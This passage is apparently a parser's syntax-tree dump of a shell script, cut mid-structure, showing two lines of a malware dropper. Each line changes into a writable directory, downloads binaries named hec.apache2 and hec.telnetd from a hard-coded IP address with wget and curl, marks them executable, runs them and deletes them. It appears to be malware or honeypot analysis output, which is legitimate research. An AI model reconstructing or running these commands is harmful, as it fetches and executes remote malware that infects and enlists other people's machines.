    WordNode(lineno=13, pos=(2025, 2027), word='cd'),
    WordNode(lineno=13, pos=(2028, 2029), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2029, 2030)),
  CommandNode(lineno=13, pos=(2031, 2069), parts=[
    WordNode(lineno=13, pos=(2031, 2035), word='wget'),
    WordNode(lineno=13, pos=(2036, 2069), word='http://94.176.232.239/hec.apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2069, 2070)),
  CommandNode(lineno=13, pos=(2071, 2112), parts=[
    WordNode(lineno=13, pos=(2071, 2075), word='curl'),
    WordNode(lineno=13, pos=(2076, 2078), word='-O'),
    WordNode(lineno=13, pos=(2079, 2112), word='http://94.176.232.239/hec.apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2112, 2113)),
  CommandNode(lineno=13, pos=(2114, 2134), parts=[
    WordNode(lineno=13, pos=(2114, 2119), word='chmod'),
    WordNode(lineno=13, pos=(2120, 2122), word='+x'),
    WordNode(lineno=13, pos=(2123, 2134), word='hec.apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2134, 2135)),
  CommandNode(lineno=13, pos=(2136, 2149), parts=[
    WordNode(lineno=13, pos=(2136, 2149), word='./hec.apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2149, 2150)),
  CommandNode(lineno=13, pos=(2151, 2169), parts=[
    WordNode(lineno=13, pos=(2151, 2153), word='rm'),
    WordNode(lineno=13, pos=(2154, 2157), word='-rf'),
    WordNode(lineno=13, pos=(2158, 2169), word='hec.apache2'),
  ]),
])
ListNode(lineno=14, pos=(2170, 2363), parts=[
  CommandNode(lineno=14, pos=(2170, 2177), parts=[
    WordNode(lineno=14, pos=(2170, 2172), word='cd'),
    WordNode(lineno=14, pos=(2173, 2177), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2178, 2180)),
  CommandNode(lineno=14, pos=(2181, 2192), parts=[
    WordNode(lineno=14, pos=(2181, 2183), word='cd'),
    WordNode(lineno=14, pos=(2184, 2192), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2193, 2195)),
  CommandNode(lineno=14, pos=(2196, 2203), parts=[
    WordNode(lineno=14, pos=(2196, 2198), word='cd'),
    WordNode(lineno=14, pos=(2199, 2203), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2204, 2206)),
  CommandNode(lineno=14, pos=(2207, 2215), parts=[
    WordNode(lineno=14, pos=(2207, 2209), word='cd'),
    WordNode(lineno=14, pos=(2210, 2215), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2216, 2218)),
  CommandNode(lineno=14, pos=(2219, 2223), parts=[
    WordNode(lineno=14, pos=(2219, 2221), word='cd'),
    WordNode(lineno=14, pos=(2222, 2223), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2223, 2224)),
  CommandNode(lineno=14, pos=(2225, 2263), parts=[
    WordNode(lineno=14, pos=(2225, 2229), word='wget'),
    WordNode(lineno=14, pos=(2230, 2263), word='http://94.176.232.239/hec.telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2263, 2264)),
  CommandNode(lineno=14, pos=(2265, 2306), parts=[
    WordNode(lineno=14, pos=(2265, 2269), word='curl'),
    WordNode(lineno=14, pos=(2270, 2272), word='-O'),
    WordNode(lineno=14, pos=(2273, 2306), word='http://94.176.232.239/hec.telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2306, 2307)),
  CommandNode(lineno=14, pos=(2308, 2328), parts=[
    WordNode(lineno=14, pos=(2308, 2313), word='chmod'),
    WordNode(lineno=14, pos=(2314, 2316), word='+x'),
    WordNode(lineno=14, pos=(2317, 2328), word='hec.telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2328, 2329)),
  CommandNode(lineno=14, pos=(2330, 2343), parts=[
    WordNode(lineno=14, pos=(2330, 2343), word='./hec.telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2343, 2344)),
  CommandNode(lineno=14, pos=(2345, 2363), parts=[
    WordNode(lineno=14, pos=(2345, 2347), word='rm'),
    WordNode(lineno=14, pos=(2348, 2351), word='-rf'),
    WordNode(lineno=14, pos=(2352, 2363), word='hec.telnetd'),
  ]),
])
